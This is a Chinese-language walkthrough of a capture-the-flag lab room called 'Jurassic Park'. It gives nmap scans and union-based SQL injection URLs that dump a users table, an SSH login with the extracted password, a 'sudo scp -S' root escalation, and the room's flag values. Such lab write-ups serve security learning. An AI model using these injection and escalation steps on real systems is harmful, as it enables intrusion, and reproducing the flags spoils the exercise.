端口扫描

sudo nmap --min-rate 10000 -p- 10.10.234.139  
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:13 CST
Nmap scan report for 10.10.234.139 (10.10.234.139)
Host is up (0.28s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

sudo nmap -sT -sV -sC -O -p22,80 park.thm   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:14 CST
Nmap scan report for park.thm (10.10.234.139)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:1f:56:bc:66:b1:c7:d1:e9:89:ba:7e:ef:69:68:f3 (RSA)
|   256 30:28:fc:e1:97:7b:47:ab:8b:dd:84:c5:34:76:16:77 (ECDSA)
|_  256 5a:92:54:50:f5:04:a7:36:a1:d1:b4:32:ee:2b:e5:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Jarassic Park
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (96%), Linux 3.10 - 3.13 (96%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.83 seconds

一边放着扫一下目录

Web

http://park.thm/item.php?id=1

界面发现有GET方式传参，输入引号貌似有过滤，但是发现可以直接union select，试出来是5列

http://park.thm/item.php?id=5%20union%20select%201,database(),3,4,5

数据库名叫做park

http://park.thm/item.php?id=5%20union%20select%201,version(),3,4,5

系统版本是ubuntu16.04

http://park.thm/item.php?id=5%20union%20select%201,group_concat(table_name),3,4,5%20FROM%20information_schema.tables%20WHERE%20table_schema%20=database()

得到

有2个表:items,users

http://park.thm/item.php?id=5%20union%20select%201,group_concat(column_name),3,4,5%20FROM%20information_schema.columns%20WHERE%20table_schema%20=database()%20and%20table_name%20=%20%22users%22

得到三字段:id,username,password

当想注入出这三个参数时又来到了黑名单界面，尝试之后发现是username被过滤了

http://park.thm/item.php?id=5%20union%20select%201,id,0x3a,password,5%20FROM%20users

只能得到密码:ih8dinos

但是房间的题目已经告诉我们用户名是dennis

发现是SSH密码，成功登录

flag1

b89f2d69c56b9981ac92dd267f

提权

发现我们有scp的特权身份？？

直接

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

我们已经是ROOT了？？

find / -name "flag*"

直接找到剩下的几个flag

flag2

96ccd6b429be8c9a4b501c7a0b117b0a

flag3(竟然在dennis的用户bashhistory里。。。)

b4973bbc9053807856ec815db25fb3f1

flag5

2a7074e491fcacc7eeba97808dc5e2ec

碎碎念

说实话，非常失望的一个靶机。。。标的是HARD难度，sql注入虽然有一些过滤，但等于没过滤。提权也是一把梭，几个flag设置的也没有什么意义。有点浪费时间了